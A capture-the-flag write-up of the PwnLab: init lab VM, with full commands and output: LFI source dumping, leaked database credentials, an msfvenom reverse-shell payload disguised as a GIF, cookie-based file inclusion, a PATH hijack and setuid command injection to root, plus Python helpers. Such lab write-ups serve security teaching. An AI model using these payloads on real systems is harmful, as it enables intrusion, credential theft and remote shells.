About

  • Download: click here
  • Flag: /root/flag.txt
  • First day of the holiday
  • Bilibili video

Information gathering

nmap -sn 192.168.7.1/24
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.1
Host is up (0.00071s latency).
Nmap scan report for 192.168.7.130
Host is up (0.00060s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds

Service/version scan of the live host (the http-server-header and mysql-info output below comes from nmap's version detection):

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.130
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 44040/tcp status
|_ 100024 1 51756/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 53
| Version: .5.47-0+deb8u1
| Thread ID: 84
| Capabilities flags: 63487
| Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient
| Status: Autocommit
|_ Salt: "]0w'Xi((0XLS:j'"r<q
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds

  1. Ports 80 and 3306 are open and the OS is Debian, so start with the web app.
  2. The URLs follow a pattern: whatever comes after page= looks like a file name with its extension stripped, so index.php probably does something like this:
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
}
?>

That is our guess for index.php; the source dumped below confirms it.

http://192.168.7.130/?page=login
http://192.168.7.130/?page=upload
  1. This is very likely a local file inclusion (LFI).
  2. Build the URL http://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login. The ".php" that the include appends lands on the resource= part, so this reads login.php, and the base64 filter makes PHP return the file's bytes instead of executing them.
  3. The file is included and its contents come back base64-encoded; decode them:
---login.php---

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);
    $stmt->execute();
    $stmt->store_Result();

    if ($stmt->num_rows == 1)
    {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {
        echo "Login failed.";
    }
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
  1. Next, read config.php, which login.php pulls in with require:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
  1. Read index.php and upload.php the same way:
---index---
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>

---upload---
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];   // Content-Type as sent by the client
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }
        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }
        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }
        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}
?>
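As an added example (not code from the original write-up), a small Python helper for the source-reading step above: filter_url() builds the php://filter URL for a page name, and decode_source() pulls the base64 blob out of the HTML that index.php wraps around the include and decodes it. TARGET is the lab address used in the write-up; SAMPLE_RESPONSE is a constructed response body so the decoder can be checked without the VM.

```python
"""Dump PHP source through the ?page= include with the php://filter wrapper.

Added example; not code from the original write-up.  TARGET is the lab address
from the write-up.  SAMPLE_RESPONSE is a constructed response body (index.php's
HTML around a base64 blob) so decode_source() can be exercised offline.
"""
import base64
import re
import urllib.request

TARGET = "http://192.168.7.130/"


def filter_url(page, base=TARGET):
    """index.php does include($_GET['page'] . ".php"), so the appended suffix
    lands on the filter's resource= part: resource=login becomes login.php.
    convert.base64-encode makes PHP return the file's bytes instead of
    executing them, which is what lets us read config.php."""
    return f"{base}?page=php://filter/convert.base64-encode/resource={page}"


def decode_source(body):
    """The include output is embedded in index.php's HTML.  The base64 blob is
    by far the longest run of base64-alphabet characters on the page, so take
    the longest candidate and decode it."""
    runs = re.findall(rb"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 payload in response; did the include fail?")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


def fetch_source(page):
    """Live version: only meaningful from inside the lab network."""
    with urllib.request.urlopen(filter_url(page), timeout=10) as resp:
        return decode_source(resp.read())


# Constructed sample: what the page looks like with a tiny config.php included.
SAMPLE_SOURCE = '<?php\n$username = "root";\n$password = "H4u%QJ_H99";\n?>\n'
SAMPLE_RESPONSE = (
    b'<html><body><center><img src="images/pwnlab.png"><br />\n'
    + base64.b64encode(SAMPLE_SOURCE.encode())
    + b'\n</center></body></html>'
)

if __name__ == "__main__":
    print(decode_source(SAMPLE_RESPONSE))
    for page in ("index", "login", "upload", "config"):
        print(f"--- {page}.php ---")
        print(fetch_source(page))
```

Because the suffix is appended server-side, any page name works as long as the resulting resource exists; a page that does not exist produces an include warning and no blob, which is why decode_source() raises instead of returning an empty string.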
  1. config.php already gave us the MySQL root credentials, and the nmap scan showed 3306 reachable from our host, so the database can be queried directly.
  2. mysql -h 192.168.7.130 -u root -D Users -p, with the password from config.php. The pass column is base64 (login.php base64-encodes the submitted password before comparing it), so decode each value:
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |   base64-decoded: JWzXuBJJNy
| mike | U0lmZHNURW42SQ== |   base64-decoded: SIfdsTEn6I
| kane | aVN2NVltMkdSbw== |   base64-decoded: iSv5Ym2GRo
+------+------------------+
3 rows in set (0.01 sec)
  1. Log in and try an upload. From the source we already know only image extensions get through, and both the Content-Type sent by the client and the MIME type reported by getimagesize() are checked.

Bypassing the upload filter

  • Method 1: prepend an image signature to the payload
  1. echo GIF89a > kali.gif
  2. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >> kali.gif
  The .gif extension satisfies the whitelist, the browser sends Content-Type: image/gif for it, and the GIF89a signature is all getimagesize() looks at before reporting image/gif.
  • Method 2: do it in Burp Suite; you are all more practised with it than I am.
  1. The upload returns a relative path whose file name is the md5 of the original name: upload/51c65dd716e81189745d6eb1c9f1bb6b.gif
  2. Requesting it directly will not execute it (Apache serves .gif as a static file), but index.php has a second include, include("lang/".$_COOKIE['lang']), with no ".php" appended, so an arbitrary path can be passed in through the cookie:
  3. curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>
  1. That works, so swap ../../../../etc/passwd for the path of the file we uploaded (a single ../ steps out of lang/ and into upload/).
  2. curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"
  3. The Metasploit handler listening on 7788 receives the session:
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800
meterpreter >

Privilege escalation

  1. The usual routine: upgrade to a tty with python -c 'import pty;pty.spawn("/bin/bash")', then try the decoded database passwords against the local accounts with su (kent, mike and kane all appear in /etc/passwd).
  2. kane's password is reused. His home directory contains a setuid/setgid ELF owned by mike:
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
  1. It fails because /home/mike/msg.txt does not exist. Pull the binary back to the attacking box for a look: python -m SimpleHTTPServer on the target serves the current directory on port 8000, then open http://192.168.7.130:8000 in a browser and download msgmike.
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -
192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -
192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -
  1. Dropped into IDA, the binary just calls system("cat /home/mike/msg.txt"). system() hands that string to /bin/sh, and because "cat" is given without a path the shell looks it up through PATH, an environment variable the caller controls. So we point PATH at the current directory.
  2. With PATH replaced, "cat" resolves to a script of ours that starts a shell, and the setuid bit means it runs with mike's uid:

kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat
kane@pwnlab:~$ ls
cat msgmike
kane@pwnlab:~$ chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$
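An added example of the PATH lookup that makes this work (not code from the write-up): resolve_like_sh() walks PATH the way /bin/sh does for a bare command name, a temporary directory stands in for /home/kane with a planted "cat" in place of the author's echo "/bin/bash" > cat, and hardened_run() is the call msgmike should have made instead. Nothing here is setuid, so it shows which file would run, not a uid change.

```python
"""PATH hijack of a setuid binary that runs system("cat /home/mike/msg.txt").

Added example, not code from the original write-up.  resolve_like_sh() mimics the
PATH search /bin/sh does for a bare command name; a temporary directory plays the
role of /home/kane and the planted script the role of the author's fake "cat".
Nothing here is setuid, so the demo shows which file would run, not a uid change.
"""
import os
import stat
import subprocess
import tempfile

VULN_COMMAND = "cat /home/mike/msg.txt"     # what msgmike passes to system()
SANE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_like_sh(name, path_env):
    """First executable regular file called `name` in the PATH directories,
    searched left to right, or None.  An empty PATH element means '.'."""
    for d in path_env.split(":"):
        cand = os.path.join(d or ".", name)
        try:
            st = os.stat(cand)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IXUSR:
            return cand
    return None


def plant_fake_cat(directory):
    """The author's 'echo /bin/bash > cat; chmod 777 cat', with a marker line
    instead of an interactive shell so the effect is visible non-interactively."""
    path = os.path.join(directory, "cat")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho HIJACKED as $(id -un)\n")
    os.chmod(path, 0o755)
    return path


def hijack_demo():
    """Returns (fake cat wins under PATH=<our dir>, what a sane PATH resolves to)."""
    with tempfile.TemporaryDirectory() as home:
        fake = plant_fake_cat(home)
        picked = resolve_like_sh("cat", home)        # export PATH=/home/kane
        return picked == fake, resolve_like_sh("cat", SANE_PATH)


def hardened_run(path):
    """What msgmike should have done: absolute binary, argv list (no shell
    parsing) and an explicit environment.  Returns the CompletedProcess."""
    return subprocess.run(["/bin/cat", path], env={"PATH": "/usr/bin:/bin"},
                          capture_output=True, text=True)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as home:
        plant_fake_cat(home)
        # Vulnerable: system() hands the string to /bin/sh, which consults our PATH.
        subprocess.run(VULN_COMMAND, shell=True, env={"PATH": home})
    print(hardened_run("/home/mike/msg.txt").stderr.strip())
    print(hijack_demo())
```

The "dircolors: command not found" lines in the session above are the same mechanism seen from the other side: once PATH is just /home/kane, bash's own startup files cannot find their helpers either.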
  1. We are now mike (the "command not found" lines come from bash's startup files, since PATH contains only /home/kane). Restore it with export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin. mike's home directory holds another setuid binary, msg2root; in IDA it formats the message into "/bin/echo %s >> /root/messages.txt" and hands the result to system().
  2. The intent is to append the message to a file, but the message is spliced into a shell command line unquoted: a ; (or any other shell metacharacter) ends the echo and whatever follows runs as a separate command, with root privileges because the binary is setuid root. Note in the id output below that only the effective uid is 0. /bin/sh (dash on Debian) keeps that euid, whereas bash drops it back to the real uid unless started with -p, so /bin/sh is the right shell to ask for.
mike@pwnlab:/home/mike$ ./msg2root
Message for root: id ; whoami
id
root
mike@pwnlab:/home/mike$ ./msg2root
Message for root: asdasdasdas;/bin/sh
asdasdasdas
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
cd /root
ls
flag.txt messages.txt
cat flag.txt
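An added Python example of the injection (not code from the write-up), built around the format string recovered from IDA: vulnerable_append() reproduces the system() call, fixed_append() is the no-shell alternative, and demo() feeds an injected message to both. The log file is a temporary file instead of /root/messages.txt and nothing is setuid, so the injected command runs as you rather than root.

```python
"""Shell injection through msg2root's system("/bin/echo %s >> /root/messages.txt").

Added example, not code from the original write-up.  FMT is the format string
the author recovered in IDA; the log is a temporary file rather than
/root/messages.txt and nothing is setuid, so the injected command runs as the
current user instead of root.  fixed_append() is the non-shell alternative.
"""
import os
import subprocess
import tempfile

FMT = "/bin/echo %s >> %s"     # msg2root builds this string and calls system()


def vulnerable_append(msg, logfile):
    """The message is spliced into a command line unquoted and handed to /bin/sh,
    so ';', '|', '$(...)' and friends in it are interpreted, with the caller's euid."""
    subprocess.run(FMT % (msg, logfile), shell=True)


def fixed_append(msg, logfile):
    """No shell at all: argv is a list and the caller performs the redirect
    itself, so the message is only ever data."""
    with open(logfile, "a") as fh:
        subprocess.run(["/bin/echo", msg], stdout=fh, check=True)


def demo():
    """Feed the author's style of payload to both versions and report what
    happened: did the injected command run, and what reached the log."""
    results = {}
    for label, fn in (("vulnerable", vulnerable_append), ("fixed", fixed_append)):
        with tempfile.TemporaryDirectory() as d:
            log = os.path.join(d, "messages.txt")
            marker = os.path.join(d, "injected")
            fn("hello; touch " + marker, log)          # cf. "asdasdasdas;/bin/sh"
            results[label] = {
                "injected_ran": os.path.exists(marker),
                "logged": open(log).read() if os.path.exists(log) else None,
            }
    return results


if __name__ == "__main__":
    for label, r in demo().items():
        print(label, r)
```

Look at what the vulnerable version logs: nothing. The ; splits the command line, so the redirection is attached to the attacker's command rather than to /bin/echo, and the message never reaches the file. Quoting the message with shlex.quote() before formatting would also close the hole, but passing an argv list and doing the redirect in the program removes the shell from the picture entirely.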

.-=~=-.                                                                 .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
#
